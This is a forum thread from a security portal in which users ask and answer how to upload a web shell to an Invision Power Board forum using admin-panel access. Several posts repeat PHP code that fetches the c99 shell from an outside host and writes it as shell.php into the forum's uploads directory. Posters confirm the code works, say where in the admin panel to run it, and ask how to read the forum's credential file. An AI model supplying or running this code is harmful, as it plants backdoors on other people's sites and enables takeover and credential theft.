Waraxe IT Security Portal
Login or Register
July 27, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 219
Members: 0
Total: 219
Full disclosure
CyberDanube Security Research 20240722-0 | Multiple Vulnerabilities in Perten/PerkinElmer ProcessPlus
[KIS-2024-06] XenForo <= 2.2.15 (Template System) Remote Code Execution Vulnerability
[KIS-2024-05] XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability
CVE-2024-33326
CVE-2024-33327
CVE-2024-33328
CVE-2024-33329
CyberDanube Security Research 20240703-0 | Authenticated Command Injection in Helmholz Industrial Router REX100
SEC Consult SA-20240627-0 :: Local Privilege Escalation via MSI installer in SoftMaker Office / FreeOffice
SEC Consult SA-20240626-0 :: Multiple Vulnerabilities in Siemens Power Automation Products
Novel DoS Vulnerability Affecting WebRTC Media Servers
APPLE-SA-06-25-2024-1 AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8
40 vulnerabilities in Toshiba Multi-Function Printers
17 vulnerabilities in Sharp Multi-Function Printers
SEC Consult SA-20240624-0 :: Multiple Vulnerabilities allowing complete bypass in Faronics WINSelect (Standard + Enterprise)
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Invision Power Board -> how to upload shell on invision power board forum?
Post new topicReply to topic View previous topic :: View next topic
how to upload shell on invision power board forum?
PostPosted: Fri Jan 02, 2009 10:45 pm Reply with quote
danzic
Regular user
Regular user
Joined: Jan 03, 2009
Posts: 5




how to upload shell on invision power board forum?

hi,

i have access to the acp (admin control panel) via admin username and password, i've tried to login to cpanel using the same credentials with the off chance that it might work, but no no avail it never worked.

anyone know how to upload a shell via the acp?

i know its possible with vbulletin forums via the add plugin feature, but i have not found a way to do this with invision power board.

if anyone knows how to or anything about this, it would be much appreciated if you informed me.

cheers
View user's profile Send private message
PostPosted: Tue Jan 06, 2009 8:39 pm Reply with quote
QMX
Regular user
Regular user
Joined: Jan 06, 2009
Posts: 7




I've seen this posted here:

Code:
$linky="http://www.evilc0der.com/c99.txt";
$saved="/home/path/towhatever/forum/uploads/shell.php";
$from=fopen("$linky","r");
$to=fopen("$saved","w");
while(!feof($from)){
$string=fgets($from,4096);
fputs($to,$string);
}
fclose($to);
fclose($from);


I've tried that in IPB 2.3.6 Doesnt work

Also tried everything else here and no luck.

Does anyone know if 2.3.5 is different? Or do you have to execute this command with Root admin (not regular admin).
View user's profile Send private message
PostPosted: Tue Jan 06, 2009 10:14 pm Reply with quote
QMX
Regular user
Regular user
Joined: Jan 06, 2009
Posts: 7




Ok, This does work. I tried it in a test IPB Install. BUT.. You must execute it as a root admin or else it wont work.

Code:
$linky="http://www.evilc0der.com/c99.txt";
$saved="/home/path/towhatever/forum/uploads/shell.php";
$from=fopen("$linky","r");
$to=fopen("$saved","w");
while(!feof($from)){
$string=fgets($from,4096);
fputs($to,$string);
}
fclose($to);
fclose($from);


So......... does anyone know how to read conf_global.php from the admin panel using basic admin privilege??

[/code]
View user's profile Send private message
PostPosted: Wed Jan 07, 2009 6:09 am Reply with quote
waplet
Active user
Active user
Joined: Dec 24, 2008
Posts: 31




i tested this shell upload on IPB 2.3.6 and all was good, dont understand what problems you have!
View user's profile Send private message
PostPosted: Wed Jan 07, 2009 6:32 pm Reply with quote
QMX
Regular user
Regular user
Joined: Jan 06, 2009
Posts: 7




The problem is not the IPB version.

There is two different types of Admin users in IPB.

Root admin- (usually UID 1- has complete access to the board/SQL tools)
^---- I don't have this access.

Administrator- (Can access the admin panel, but cant add a shell using the method above or access SQL toolbox)
^--- I do have this access.
View user's profile Send private message
...
PostPosted: Wed Jan 21, 2009 6:48 pm Reply with quote
sWeeP
Regular user
Regular user
Joined: Jan 21, 2009
Posts: 16
Location: Serbia




can you tell me in which file i save this code?
View user's profile Send private message
PostPosted: Sun Apr 12, 2009 12:04 am Reply with quote
r00t3d
Beginner
Beginner
Joined: Oct 09, 2008
Posts: 4




waplet wrote:
i tested this shell upload on IPB 2.3.6 and all was good, dont understand what problems you have!


do ya mind explaining a bit,how ya did it?thanks
View user's profile Send private message
PostPosted: Thu Jun 18, 2009 1:03 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




http://www.waraxe.us/ftopict-5071.html
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Thu May 12, 2011 9:06 am Reply with quote
pragna
Beginner
Beginner
Joined: Mar 28, 2011
Posts: 4




QMX wrote:
Ok, This does work. I tried it in a test IPB Install. BUT.. You must execute it as a root admin or else it wont work.

Code:
$linky="http://www.evilc0der.com/c99.txt";
$saved="/home/path/towhatever/forum/uploads/shell.php";
$from=fopen("$linky","r");
$to=fopen("$saved","w");
while(!feof($from)){
$string=fgets($from,4096);
fputs($to,$string);
}
fclose($to);
fclose($from);


So......... does anyone know how to read conf_global.php from the admin panel using basic admin privilege??

[/code]


Where i must execute this? in the help ? Can i do this without system command?


http://www.waraxe.us/ftopict-5071.html
this doesnt work for me because the system command is disabled Sad
View user's profile Send private message
PostPosted: Thu May 12, 2011 1:14 pm Reply with quote
-AO-
Advanced user
Advanced user
Joined: Jul 15, 2008
Posts: 205
Location: United States




execute in the modules area of admin panel. the code doesn't use system.
View user's profile Send private message Yahoo Messenger
how to upload shell on invision power board forum?
www.waraxe.us Forum Index -> Invision Power Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.452 Seconds